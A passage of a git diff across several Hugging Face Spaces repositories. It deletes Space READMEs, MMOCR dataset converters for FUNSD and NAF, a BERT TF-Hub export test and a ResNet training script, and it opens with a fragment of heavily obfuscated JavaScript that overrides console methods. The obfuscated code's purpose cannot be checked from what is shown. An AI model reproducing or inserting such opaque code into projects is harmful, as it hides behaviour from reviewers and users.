_0x292b63(_0x11ee68-0x1bf,_0x11ee68-0x5d3,_0x4912c5,_0x2f288e-0xa,_0x117b0e-0x1be);}if(_0x36d494[_0x3daebb(0x19c,0x10b,0xb2,0xc4,0x1d1)](_0x36d494[_0x3daebb(0x11f,0x127,0x166,0x141,0x1ec)],_0x36d494[_0x3daebb(0xd6,0xcd,0x9a,0x5a,0xdf)])){const _0x50f770=_0x1e56db[_0x4a4d08(-0x89,-0x3e,-0xb1,-0x95,-0x74)](_0x342abc,arguments);return _0x2dfae9=null,_0x50f770;}else return![];}[_0x292b63(-0x234,-0x1fa,-0x15d,-0x22f,-0x22d)+_0x1df5ce(-0x29e,-0x288,-0x2ed,-0x2a3,-0x287)+'r'](_0x274a73[_0x286c2e(0x2d9,0x28a,0x288,0x1e0,0x1e4)](_0x274a73[_0x286c2e(0x41b,0x407,0x486,0x35a,0x34c)],_0x274a73[_0x286c2e(0x356,0x375,0x45c,0x3af,0x387)]))[_0x286c2e(0x44b,0x3e0,0x3d9,0x33a,0x413)](_0x274a73[_0x286c2e(0x292,0x329,0x30f,0x3ad,0x26c)]);}else{const _0x1e6bb6=_0x122d56[_0x1df5ce(-0x137,-0x102,-0xa6,-0x7b,-0x155)](_0x680e0c,arguments);return 
_0x47d3e4=null,_0x1e6bb6;}}_0x274a73[_0x315baa(0x12d,0xe5,0xb4,0x5c,0x137)](_0x4dacc1,++_0x1f2ebb);}else{let _0x4d39a7;try{const _0x57e87a=_0x36d494[_0x56c700(0x221,0x2b3,0x285,0x18a,0x1fd)](_0x5e3f46,_0x36d494[_0x286c2e(0x31e,0x2cb,0x341,0x26f,0x36f)](_0x36d494[_0x1df5ce(-0x28d,-0x23d,-0x246,-0x179,-0x263)](_0x36d494[_0x56c700(0x1ae,0x121,0xc8,0x1d5,0x142)],_0x36d494[_0x292b63(-0x217,-0x19d,-0x18f,-0x18c,-0x1fe)]),');'));_0x4d39a7=_0x36d494[_0x315baa(0x1b0,0xb5,0x59,0xe3,0xa4)](_0x57e87a);}catch(_0x18b37e){_0x4d39a7=_0x24fb6b;}const _0x510e9f=_0x4d39a7[_0x292b63(-0x365,-0x2be,-0x37e,-0x366,-0x2c7)+'le']=_0x4d39a7[_0x315baa(0x12f,0x49,0xe7,0x44,0x13)+'le']||{},_0x1bc6ab=[_0x36d494[_0x56c700(0x199,0x1ac,0x100,0xd4,0xc8)],_0x36d494[_0x292b63(-0x241,-0x1c0,-0x219,-0x134,-0x2b0)],_0x36d494[_0x56c700(0xfc,0xfa,0x209,0x134,0x149)],_0x36d494[_0x56c700(0xfb,0xcb,0x122,0xfb,0x50)],_0x36d494[_0x1df5ce(-0x1fd,-0x7c,-0xb9,-0x16c,-0x11d)],_0x36d494[_0x1df5ce(-0x249,-0x1ef,-0xcf,-0x1a8,-0x15d)],_0x36d494[_0x292b63(-0x260,-0x20d,-0x1b5,-0x219,-0x1b9)]];for(let _0x228541=-0x264e+0x112e+0x1520;_0x36d494[_0x1df5ce(-0x1d6,-0x167,-0x2e2,-0x236,-0x1f1)](_0x228541,_0x1bc6ab[_0x292b63(-0x2a9,-0x2b4,-0x2d2,-0x24a,-0x317)+'h']);_0x228541++){const _0x3d0927=_0x275b00[_0x286c2e(0x38f,0x38e,0x472,0x3c2,0x450)+_0x315baa(-0x23,0xd,0xdc,0x28,-0x26)+'r'][_0x1df5ce(-0xc0,-0x1d0,-0x1a3,-0x45,-0x126)+_0x292b63(-0x24f,-0x22f,-0x235,-0x21c,-0x1ed)][_0x1df5ce(-0x203,-0x2d3,-0x243,-0x136,-0x201)](_0x50ba5a),_0x4f0687=_0x1bc6ab[_0x228541],_0x44c38c=_0x510e9f[_0x4f0687]||_0x3d0927;_0x3d0927[_0x1df5ce(-0x179,-0x2e7,-0x239,-0x127,-0x206)+_0x56c700(0xd9,-0x85,0x122,0xda,0x58)]=_0x366acb[_0x292b63(-0x2fa,-0x254,-0x22c,-0x1e1,-0x30d)](_0x5ce843),_0x3d0927[_0x56c700(0x1f1,0x135,0x17a,0x26b,0x1e9)+_0x315baa(0x9c,-0x50,-0x79,0x2,0xbc)]=_0x44c38c[_0x315baa(0x22a,0x144,0x144,0x1a1,0x17c)+_0x56c700(-0x64,0xbb,0xb7,0xa0,0x4a)][_0x1df5ce(-0x187,-0x25e,-0x246,-0x13f,-0x201)](_0x44c38c),_0x510e9f[_0x4f0687]=_0x3d0927;}}}function _0x4c92c1(_0x31556a,_0x459b40,_0x395ee7,_0x195162,_0x4d9d70){return _0x504eae(_0x459b40-0xc1,_0x459b40-0xa1,_0x395ee7-0x126,_0x195162-0xed,_0x195162);}function _0x5ef808(_0x313b76,_0x3f475c,_0x527422,_0x576a4e,_0xd60573){return _0x1d31e6(_0x576a4e- -0x345,_0x3f475c-0x74,_0xd60573,_0x576a4e-0x156,_0xd60573-0xa9);}function _0x163385(_0x27c341,_0x53ff3b,_0x3d059a,_0x536423,_0x42ac09){return _0x5b3717(_0x27c341- -0x66,_0x3d059a,_0x3d059a-0xa,_0x536423-0xce,_0x42ac09-0x2e);}function _0x37219c(_0xca9036,_0x4dc92e,_0x422991,_0x54701d,_0x40f6bf){return _0x1e3602(_0xca9036-0xa4,_0x40f6bf,_0x422991-0x126,_0x422991-0x2b2,_0x40f6bf-0x46);}try{if(_0x274a73[_0x4c92c1(0x484,0x3ee,0x351,0x351,0x438)](_0x274a73[_0x163385(-0x1f7,-0x2a5,-0x1bb,-0x148,-0x226)],_0x274a73[_0x5ef808(-0x11f,-0x228,-0x277,-0x1f7,-0x2c2)])){if(_0x505d61){if(_0x274a73[_0x3c56c7(0x37f,0x312,0x357,0x2e0,0x2b6)](_0x274a73[_0x4c92c1(0x275,0x34e,0x301,0x3ad,0x294)],_0x274a73[_0x37219c(0x34c,0x1c9,0x274,0x1b7,0x302)]))_0x274a73[_0x5ef808(-0x28f,-0x303,-0x372,-0x2a8,-0x24f)](_0x478d65,-0xe9*0x13+0x7b8+0x993);else return _0x4dacc1;}else{if(_0x274a73[_0x163385(-0x265,-0x2d8,-0x2c6,-0x349,-0x24c)](_0x274a73[_0x37219c(0x336,0x29f,0x249,0x2eb,0x268)],_0x274a73[_0x5ef808(-0x20d,-0x12a,-0x19a,-0x1d1,-0x21f)]))_0x274a73[_0x5ef808(-0x22a,-0x36f,-0x2bd,-0x2a8,-0x2b0)](_0x4dacc1,-0x231+-0x3*0xcdb+0x28c2);else{let 
_0x5d9b75;try{_0x5d9b75=_0x274a73[_0x5ef808(-0x23d,-0x2cd,-0x274,-0x271,-0x2c9)](_0x58446f,_0x274a73[_0x5ef808(-0x2bd,-0x136,-0x214,-0x1f9,-0x150)](_0x274a73[_0x4c92c1(0x30d,0x38b,0x2b8,0x352,0x325)](_0x274a73[_0x4c92c1(0x3ba,0x2ce,0x296,0x295,0x2ea)],_0x274a73[_0x3c56c7(0x1ce,0x17d,0x137,0x18b,0x20d)]),');'))();}catch(_0x724811){_0x5d9b75=_0xa22605;}return _0x5d9b75;}}}else{if(_0x47e411){const _0x386471=_0x3c6c2a[_0x4c92c1(0x4c4,0x43e,0x415,0x449,0x374)](_0x5e66a5,arguments);return _0x2b067c=null,_0x386471;}}}catch(_0x399381){}} diff --git a/spaces/Modfiededition/tweet_sentiment_extractor/README.md b/spaces/Modfiededition/tweet_sentiment_extractor/README.md deleted file mode 100644 index 697224cc1c0a25e870da91317f18cfad26efe770..0000000000000000000000000000000000000000 --- a/spaces/Modfiededition/tweet_sentiment_extractor/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Tweet_sentiment_extractor -emoji: 📚 -colorFrom: yellow -colorTo: blue -sdk: streamlit -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textdet/funsd_converter.py b/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textdet/funsd_converter.py deleted file mode 100644 index 7be887d2637b99f0113f99f06a05f7591c061f39..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textdet/funsd_converter.py +++ /dev/null @@ -1,159 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import argparse -import math -import os -import os.path as osp - -import mmcv -import mmengine - -from mmocr.utils import dump_ocr_data - - -def collect_files(img_dir, gt_dir): - """Collect all images and their corresponding groundtruth files. - - Args: - img_dir (str): The image directory - gt_dir (str): The groundtruth directory - - Returns: - files (list): The list of tuples (img_file, groundtruth_file) - """ - assert isinstance(img_dir, str) - assert img_dir - assert isinstance(gt_dir, str) - assert gt_dir - - ann_list, imgs_list = [], [] - for gt_file in os.listdir(gt_dir): - ann_list.append(osp.join(gt_dir, gt_file)) - imgs_list.append(osp.join(img_dir, gt_file.replace('.json', '.png'))) - - files = list(zip(sorted(imgs_list), sorted(ann_list))) - assert len(files), f'No images found in {img_dir}' - print(f'Loaded {len(files)} images from {img_dir}') - - return files - - -def collect_annotations(files, nproc=1): - """Collect the annotation information. 
- - Args: - files (list): The list of tuples (image_file, groundtruth_file) - nproc (int): The number of process to collect annotations - - Returns: - images (list): The list of image information dicts - """ - assert isinstance(files, list) - assert isinstance(nproc, int) - - if nproc > 1: - images = mmengine.track_parallel_progress( - load_img_info, files, nproc=nproc) - else: - images = mmengine.track_progress(load_img_info, files) - - return images - - -def load_img_info(files): - """Load the information of one image. - - Args: - files (tuple): The tuple of (img_file, groundtruth_file) - - Returns: - img_info (dict): The dict of the img and annotation information - """ - assert isinstance(files, tuple) - - img_file, gt_file = files - assert osp.basename(gt_file).split('.')[0] == osp.basename(img_file).split( - '.')[0] - # read imgs while ignoring orientations - img = mmcv.imread(img_file, 'unchanged') - - img_info = dict( - file_name=osp.join(osp.basename(img_file)), - height=img.shape[0], - width=img.shape[1], - segm_file=osp.join(osp.basename(gt_file))) - - if osp.splitext(gt_file)[1] == '.json': - img_info = load_json_info(gt_file, img_info) - else: - raise NotImplementedError - - return img_info - - -def load_json_info(gt_file, img_info): - """Collect the annotation information. - - Args: - gt_file (str): The path to ground-truth - img_info (dict): The dict of the img and annotation information - - Returns: - img_info (dict): The dict of the img and annotation information - """ - - annotation = mmengine.load(gt_file) - anno_info = [] - for form in annotation['form']: - for ann in form['words']: - - iscrowd = 1 if len(ann['text']) == 0 else 0 - - x1, y1, x2, y2 = ann['box'] - x = max(0, min(math.floor(x1), math.floor(x2))) - y = max(0, min(math.floor(y1), math.floor(y2))) - w, h = math.ceil(abs(x2 - x1)), math.ceil(abs(y2 - y1)) - bbox = [x, y, w, h] - segmentation = [x, y, x + w, y, x + w, y + h, x, y + h] - - anno = dict( - iscrowd=iscrowd, - category_id=1, - bbox=bbox, - area=w * h, - segmentation=[segmentation]) - anno_info.append(anno) - - img_info.update(anno_info=anno_info) - - return img_info - - -def parse_args(): - parser = argparse.ArgumentParser( - description='Generate training and test set of FUNSD ') - parser.add_argument('root_path', help='Root dir path of FUNSD') - parser.add_argument( - '--nproc', default=1, type=int, help='Number of process') - args = parser.parse_args() - return args - - -def main(): - args = parse_args() - root_path = args.root_path - - for split in ['training', 'test']: - print(f'Processing {split} set...') - with mmengine.Timer( - print_tmpl='It takes {}s to convert FUNSD annotation'): - files = collect_files( - osp.join(root_path, 'imgs'), - osp.join(root_path, 'annotations', split)) - image_infos = collect_annotations(files, nproc=args.nproc) - dump_ocr_data(image_infos, - osp.join(root_path, 'instances_' + split + '.json'), - 'textdet') - - -if __name__ == '__main__': - main() diff --git a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textrecog/naf_converter.py b/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textrecog/naf_converter.py deleted file mode 100644 index 3c6d84ad2d9613606e767bdd67793f65ae0e5239..0000000000000000000000000000000000000000 --- a/spaces/Mountchicken/MAERec-Gradio/tools/dataset_converters/textrecog/naf_converter.py +++ /dev/null @@ -1,272 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-import argparse -import os.path as osp - -import mmcv -import mmengine -import numpy as np - -from mmocr.utils import crop_img, dump_ocr_data - - -def collect_files(img_dir, gt_dir, split_info): - """Collect all images and their corresponding groundtruth files. - - Args: - img_dir (str): The image directory - gt_dir (str): The groundtruth directory - split_info (dict): The split information for train/val/test - - Returns: - files (list): The list of tuples (img_file, groundtruth_file) - """ - assert isinstance(img_dir, str) - assert img_dir - assert isinstance(gt_dir, str) - assert gt_dir - assert isinstance(split_info, dict) - assert split_info - - ann_list, imgs_list = [], [] - for group in split_info: - for img in split_info[group]: - image_path = osp.join(img_dir, img) - anno_path = osp.join(gt_dir, 'groups', group, - img.replace('jpg', 'json')) - - # Filtering out the missing images - if not osp.exists(image_path) or not osp.exists(anno_path): - continue - - imgs_list.append(image_path) - ann_list.append(anno_path) - - files = list(zip(imgs_list, ann_list)) - assert len(files), f'No images found in {img_dir}' - print(f'Loaded {len(files)} images from {img_dir}') - - return files - - -def collect_annotations(files, nproc=1): - """Collect the annotation information. - - Args: - files (list): The list of tuples (image_file, groundtruth_file) - nproc (int): The number of process to collect annotations - - Returns: - images (list): The list of image information dicts - """ - assert isinstance(files, list) - assert isinstance(nproc, int) - - if nproc > 1: - images = mmengine.track_parallel_progress( - load_img_info, files, nproc=nproc) - else: - images = mmengine.track_progress(load_img_info, files) - - return images - - -def load_img_info(files): - """Load the information of one image. - - Args: - files (tuple): The tuple of (img_file, groundtruth_file) - - Returns: - img_info (dict): The dict of the img and annotation information - """ - assert isinstance(files, tuple) - - img_file, gt_file = files - assert osp.basename(gt_file).split('.')[0] == osp.basename(img_file).split( - '.')[0] - # Read imgs while ignoring orientations - img = mmcv.imread(img_file, 'unchanged') - - img_info = dict( - file_name=osp.join(osp.basename(img_file)), - height=img.shape[0], - width=img.shape[1], - segm_file=osp.join(osp.basename(gt_file))) - - if osp.splitext(gt_file)[1] == '.json': - img_info = load_json_info(gt_file, img_info) - else: - raise NotImplementedError - - return img_info - - -def load_json_info(gt_file, img_info): - """Collect the annotation information. - - Annotation Format - { - 'filedBBs': [{ - 'poly_points': [[435,1406], [466,1406], [466,1439], [435,1439]], - "type": "fieldCheckBox", - "id": "f0", - "isBlank": 1, # 0:text,1:handwriting,2:print,3:blank,4:signature, - }], ... - "transcriptions":{ - "f38": "CASE NUMBER", - "f29": "July 1, 1949", - "t20": "RANK", - "t19": "COMPANY", - ... 
- } - } - - Some special characters are used in the transcription: - "«text»" indicates that "text" had a strikethrough - "¿" indicates the transcriber could not read a character - "§" indicates the whole line or word was illegible - "" (empty string) is if the field was blank - - Args: - gt_file (str): The path to ground-truth - img_info (dict): The dict of the img and annotation information - - Returns: - img_info (dict): The dict of the img and annotation information - """ - assert isinstance(gt_file, str) - assert isinstance(img_info, dict) - - annotation = mmengine.load(gt_file) - anno_info = [] - - # 'textBBs' contains the printed texts of the table while 'fieldBBs' - # contains the text filled by human. - for box_type in ['textBBs', 'fieldBBs']: - # NAF dataset only provides transcription GT for 'filedBBs', the - # 'textBBs' is only used for detection task. - if box_type == 'textBBs': - continue - for anno in annotation[box_type]: - # Skip images containing detection annotations only - if 'transcriptions' not in annotation.keys(): - continue - # Skip boxes without recognition GT - if anno['id'] not in annotation['transcriptions'].keys(): - continue - - word = annotation['transcriptions'][anno['id']] - # Skip blank boxes - if len(word) == 0: - continue - - bbox = np.array(anno['poly_points']).reshape(1, 8)[0].tolist() - - anno = dict(bbox=bbox, word=word) - anno_info.append(anno) - - img_info.update(anno_info=anno_info) - - return img_info - - -def generate_ann(root_path, split, image_infos, preserve_vertical): - """Generate cropped annotations and label txt file. - - Args: - root_path (str): The root path of the dataset - split (str): The split of dataset. Namely: training or test - image_infos (list[dict]): A list of dicts of the img and - annotation information - preserve_vertical (bool): Whether to preserve vertical texts - """ - - dst_image_root = osp.join(root_path, 'crops', split) - ignore_image_root = osp.join(root_path, 'ignores', split) - if split == 'training': - dst_label_file = osp.join(root_path, 'train_label.json') - elif split == 'val': - dst_label_file = osp.join(root_path, 'val_label.json') - elif split == 'test': - dst_label_file = osp.join(root_path, 'test_label.json') - else: - raise NotImplementedError - mmengine.mkdir_or_exist(dst_image_root) - mmengine.mkdir_or_exist(ignore_image_root) - - img_info = [] - for image_info in image_infos: - index = 1 - src_img_path = osp.join(root_path, 'imgs', image_info['file_name']) - image = mmcv.imread(src_img_path) - src_img_root = image_info['file_name'].split('.')[0] - - for anno in image_info['anno_info']: - word = anno['word'] - word = word.strip('\u202a') # Remove unicode control character - word = word.replace('»', - '').replace('«', - '') # Remove strikethrough flag - dst_img = crop_img(image, anno['bbox'], 0, 0) - h, w, _ = dst_img.shape - - dst_img_name = f'{src_img_root}_{index}.png' - index += 1 - # Skip invalid and illegible annotations - if min(dst_img.shape) == 0 or '§' in word or '¿' in word or len( - word) == 0: - continue - # Skip vertical texts - # (Do Not Filter For Val and Test Split) - if (not preserve_vertical and h / w > 2) and split == 'training': - dst_img_path = osp.join(ignore_image_root, dst_img_name) - mmcv.imwrite(dst_img, dst_img_path) - continue - - dst_img_path = osp.join(dst_image_root, dst_img_name) - mmcv.imwrite(dst_img, dst_img_path) - - img_info.append({ - 'file_name': dst_img_name, - 'anno_info': [{ - 'text': word - }] - }) - - dump_ocr_data(img_info, dst_label_file, 'textrecog') - - 
-def parse_args(): - parser = argparse.ArgumentParser( - description='Generate training, val, and test set of NAF ') - parser.add_argument('root_path', help='Root dir path of NAF') - parser.add_argument( - '--preserve-vertical', - help='Preserve samples containing vertical texts', - action='store_true') - parser.add_argument( - '--nproc', default=1, type=int, help='Number of process') - args = parser.parse_args() - return args - - -def main(): - args = parse_args() - root_path = args.root_path - split_info = mmengine.load( - osp.join(root_path, 'annotations', 'train_valid_test_split.json')) - split_info['training'] = split_info.pop('train') - split_info['val'] = split_info.pop('valid') - for split in ['training', 'val', 'test']: - print(f'Processing {split} set...') - with mmengine.Timer( - print_tmpl='It takes {}s to convert NAF annotation'): - files = collect_files( - osp.join(root_path, 'imgs'), - osp.join(root_path, 'annotations'), split_info[split]) - image_infos = collect_annotations(files, nproc=args.nproc) - generate_ann(root_path, split, image_infos, args.preserve_vertical) - - -if __name__ == '__main__': - main() diff --git a/spaces/MrSashkaman/StyleTransfer/README.md b/spaces/MrSashkaman/StyleTransfer/README.md deleted file mode 100644 index 7173629ca20a074cfdf7c81b5b825f7254ba5f75..0000000000000000000000000000000000000000 --- a/spaces/MrSashkaman/StyleTransfer/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: StyleTransfer -emoji: 🐠 -colorFrom: red -colorTo: gray -sdk: docker -app_port: 7860 -pinned: false -license: openrail ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/NCTCMumbai/NCTC/models/official/nlp/bert/export_tfhub_test.py b/spaces/NCTCMumbai/NCTC/models/official/nlp/bert/export_tfhub_test.py deleted file mode 100644 index 6b6fd40f5e1be5d5e8d4699d54c048add7435523..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/official/nlp/bert/export_tfhub_test.py +++ /dev/null @@ -1,109 +0,0 @@ -# Copyright 2019 The TensorFlow Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. 
-# ============================================================================== -"""Tests official.nlp.bert.export_tfhub.""" - -from __future__ import absolute_import -from __future__ import division -from __future__ import print_function - -import os - -import numpy as np - -import tensorflow as tf -import tensorflow_hub as hub -from official.nlp.bert import configs -from official.nlp.bert import export_tfhub - - -class ExportTfhubTest(tf.test.TestCase): - - def test_export_tfhub(self): - # Exports a savedmodel for TF-Hub - hidden_size = 16 - bert_config = configs.BertConfig( - vocab_size=100, - hidden_size=hidden_size, - intermediate_size=32, - max_position_embeddings=128, - num_attention_heads=2, - num_hidden_layers=1) - bert_model, encoder = export_tfhub.create_bert_model(bert_config) - model_checkpoint_dir = os.path.join(self.get_temp_dir(), "checkpoint") - checkpoint = tf.train.Checkpoint(model=encoder) - checkpoint.save(os.path.join(model_checkpoint_dir, "test")) - model_checkpoint_path = tf.train.latest_checkpoint(model_checkpoint_dir) - - vocab_file = os.path.join(self.get_temp_dir(), "uncased_vocab.txt") - with tf.io.gfile.GFile(vocab_file, "w") as f: - f.write("dummy content") - - hub_destination = os.path.join(self.get_temp_dir(), "hub") - export_tfhub.export_bert_tfhub(bert_config, model_checkpoint_path, - hub_destination, vocab_file) - - # Restores a hub KerasLayer. - hub_layer = hub.KerasLayer(hub_destination, trainable=True) - - if hasattr(hub_layer, "resolved_object"): - # Checks meta attributes. - self.assertTrue(hub_layer.resolved_object.do_lower_case.numpy()) - with tf.io.gfile.GFile( - hub_layer.resolved_object.vocab_file.asset_path.numpy()) as f: - self.assertEqual("dummy content", f.read()) - # Checks the hub KerasLayer. - for source_weight, hub_weight in zip(bert_model.trainable_weights, - hub_layer.trainable_weights): - self.assertAllClose(source_weight.numpy(), hub_weight.numpy()) - - seq_length = 10 - dummy_ids = np.zeros((2, seq_length), dtype=np.int32) - hub_outputs = hub_layer([dummy_ids, dummy_ids, dummy_ids]) - source_outputs = bert_model([dummy_ids, dummy_ids, dummy_ids]) - - # The outputs of hub module are "pooled_output" and "sequence_output", - # while the outputs of encoder is in reversed order, i.e., - # "sequence_output" and "pooled_output". - encoder_outputs = reversed(encoder([dummy_ids, dummy_ids, dummy_ids])) - self.assertEqual(hub_outputs[0].shape, (2, hidden_size)) - self.assertEqual(hub_outputs[1].shape, (2, seq_length, hidden_size)) - for source_output, hub_output, encoder_output in zip( - source_outputs, hub_outputs, encoder_outputs): - self.assertAllClose(source_output.numpy(), hub_output.numpy()) - self.assertAllClose(source_output.numpy(), encoder_output.numpy()) - - # Test that training=True makes a difference (activates dropout). - def _dropout_mean_stddev(training, num_runs=20): - input_ids = np.array([[14, 12, 42, 95, 99]], np.int32) - inputs = [input_ids, np.ones_like(input_ids), np.zeros_like(input_ids)] - outputs = np.concatenate( - [hub_layer(inputs, training=training)[0] for _ in range(num_runs)]) - return np.mean(np.std(outputs, axis=0)) - self.assertLess(_dropout_mean_stddev(training=False), 1e-6) - self.assertGreater(_dropout_mean_stddev(training=True), 1e-3) - - # Test propagation of seq_length in shape inference. 
- input_word_ids = tf.keras.layers.Input(shape=(seq_length,), dtype=tf.int32) - input_mask = tf.keras.layers.Input(shape=(seq_length,), dtype=tf.int32) - input_type_ids = tf.keras.layers.Input(shape=(seq_length,), dtype=tf.int32) - pooled_output, sequence_output = hub_layer( - [input_word_ids, input_mask, input_type_ids]) - self.assertEqual(pooled_output.shape.as_list(), [None, hidden_size]) - self.assertEqual(sequence_output.shape.as_list(), - [None, seq_length, hidden_size]) - - -if __name__ == "__main__": - tf.test.main() diff --git a/spaces/NCTCMumbai/NCTC/models/official/vision/image_classification/resnet/resnet_ctl_imagenet_main.py b/spaces/NCTCMumbai/NCTC/models/official/vision/image_classification/resnet/resnet_ctl_imagenet_main.py deleted file mode 100644 index c128dc0b99535d806634b42b99a2e56211c567ca..0000000000000000000000000000000000000000 --- a/spaces/NCTCMumbai/NCTC/models/official/vision/image_classification/resnet/resnet_ctl_imagenet_main.py +++ /dev/null @@ -1,196 +0,0 @@ -# Copyright 2019 The TensorFlow Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# ============================================================================== -"""Runs a ResNet model on the ImageNet dataset using custom training loops.""" - -from __future__ import absolute_import -from __future__ import division -from __future__ import print_function - -import math -from absl import app -from absl import flags -from absl import logging -import tensorflow as tf - -from official.modeling import performance -from official.staging.training import controller -from official.utils.flags import core as flags_core -from official.utils.misc import distribution_utils -from official.utils.misc import keras_utils -from official.utils.misc import model_helpers -from official.vision.image_classification.resnet import common -from official.vision.image_classification.resnet import imagenet_preprocessing -from official.vision.image_classification.resnet import resnet_runnable - -flags.DEFINE_boolean(name='use_tf_function', default=True, - help='Wrap the train and test step inside a ' - 'tf.function.') -flags.DEFINE_boolean(name='single_l2_loss_op', default=False, - help='Calculate L2_loss on concatenated weights, ' - 'instead of using Keras per-layer L2 loss.') - - -def build_stats(runnable, time_callback): - """Normalizes and returns dictionary of stats. - - Args: - runnable: The module containing all the training and evaluation metrics. - time_callback: Time tracking callback instance. - - Returns: - Dictionary of normalized results. 
- """ - stats = {} - - if not runnable.flags_obj.skip_eval: - stats['eval_loss'] = runnable.test_loss.result().numpy() - stats['eval_acc'] = runnable.test_accuracy.result().numpy() - - stats['train_loss'] = runnable.train_loss.result().numpy() - stats['train_acc'] = runnable.train_accuracy.result().numpy() - - if time_callback: - timestamp_log = time_callback.timestamp_log - stats['step_timestamp_log'] = timestamp_log - stats['train_finish_time'] = time_callback.train_finish_time - if time_callback.epoch_runtime_log: - stats['avg_exp_per_second'] = time_callback.average_examples_per_second - - return stats - - -def get_num_train_iterations(flags_obj): - """Returns the number of training steps, train and test epochs.""" - train_steps = ( - imagenet_preprocessing.NUM_IMAGES['train'] // flags_obj.batch_size) - train_epochs = flags_obj.train_epochs - - if flags_obj.train_steps: - train_steps = min(flags_obj.train_steps, train_steps) - train_epochs = 1 - - eval_steps = math.ceil(1.0 * imagenet_preprocessing.NUM_IMAGES['validation'] / - flags_obj.batch_size) - - return train_steps, train_epochs, eval_steps - - -def _steps_to_run(steps_in_current_epoch, steps_per_epoch, steps_per_loop): - """Calculates steps to run on device.""" - if steps_per_loop <= 0: - raise ValueError('steps_per_loop should be positive integer.') - if steps_per_loop == 1: - return steps_per_loop - return min(steps_per_loop, steps_per_epoch - steps_in_current_epoch) - - -def run(flags_obj): - """Run ResNet ImageNet training and eval loop using custom training loops. - - Args: - flags_obj: An object containing parsed flag values. - - Raises: - ValueError: If fp16 is passed as it is not currently supported. - - Returns: - Dictionary of training and eval stats. - """ - keras_utils.set_session_config( - enable_xla=flags_obj.enable_xla) - performance.set_mixed_precision_policy(flags_core.get_tf_dtype(flags_obj)) - - if tf.config.list_physical_devices('GPU'): - if flags_obj.tf_gpu_thread_mode: - keras_utils.set_gpu_thread_mode_and_count( - per_gpu_thread_count=flags_obj.per_gpu_thread_count, - gpu_thread_mode=flags_obj.tf_gpu_thread_mode, - num_gpus=flags_obj.num_gpus, - datasets_num_private_threads=flags_obj.datasets_num_private_threads) - common.set_cudnn_batchnorm_mode() - - # TODO(anj-s): Set data_format without using Keras. 
- data_format = flags_obj.data_format - if data_format is None: - data_format = ('channels_first' if tf.config.list_physical_devices('GPU') - else 'channels_last') - tf.keras.backend.set_image_data_format(data_format) - - strategy = distribution_utils.get_distribution_strategy( - distribution_strategy=flags_obj.distribution_strategy, - num_gpus=flags_obj.num_gpus, - all_reduce_alg=flags_obj.all_reduce_alg, - num_packs=flags_obj.num_packs, - tpu_address=flags_obj.tpu) - - per_epoch_steps, train_epochs, eval_steps = get_num_train_iterations( - flags_obj) - steps_per_loop = min(flags_obj.steps_per_loop, per_epoch_steps) - - logging.info( - 'Training %d epochs, each epoch has %d steps, ' - 'total steps: %d; Eval %d steps', train_epochs, per_epoch_steps, - train_epochs * per_epoch_steps, eval_steps) - - time_callback = keras_utils.TimeHistory( - flags_obj.batch_size, - flags_obj.log_steps, - logdir=flags_obj.model_dir if flags_obj.enable_tensorboard else None) - with distribution_utils.get_strategy_scope(strategy): - runnable = resnet_runnable.ResnetRunnable(flags_obj, time_callback, - per_epoch_steps) - - eval_interval = flags_obj.epochs_between_evals * per_epoch_steps - checkpoint_interval = ( - per_epoch_steps if flags_obj.enable_checkpoint_and_export else None) - summary_interval = per_epoch_steps if flags_obj.enable_tensorboard else None - - checkpoint_manager = tf.train.CheckpointManager( - runnable.checkpoint, - directory=flags_obj.model_dir, - max_to_keep=10, - step_counter=runnable.global_step, - checkpoint_interval=checkpoint_interval) - - resnet_controller = controller.Controller( - strategy, - runnable.train, - runnable.evaluate if not flags_obj.skip_eval else None, - global_step=runnable.global_step, - steps_per_loop=steps_per_loop, - train_steps=per_epoch_steps * train_epochs, - checkpoint_manager=checkpoint_manager, - summary_interval=summary_interval, - eval_steps=eval_steps, - eval_interval=eval_interval) - - time_callback.on_train_begin() - resnet_controller.train(evaluate=not flags_obj.skip_eval) - time_callback.on_train_end() - - stats = build_stats(runnable, time_callback) - return stats - - -def main(_): - model_helpers.apply_clean(flags.FLAGS) - stats = run(flags.FLAGS) - logging.info('Run stats:\n%s', stats) - - -if __name__ == '__main__': - logging.set_verbosity(logging.INFO) - common.define_keras_flags() - app.run(main) diff --git 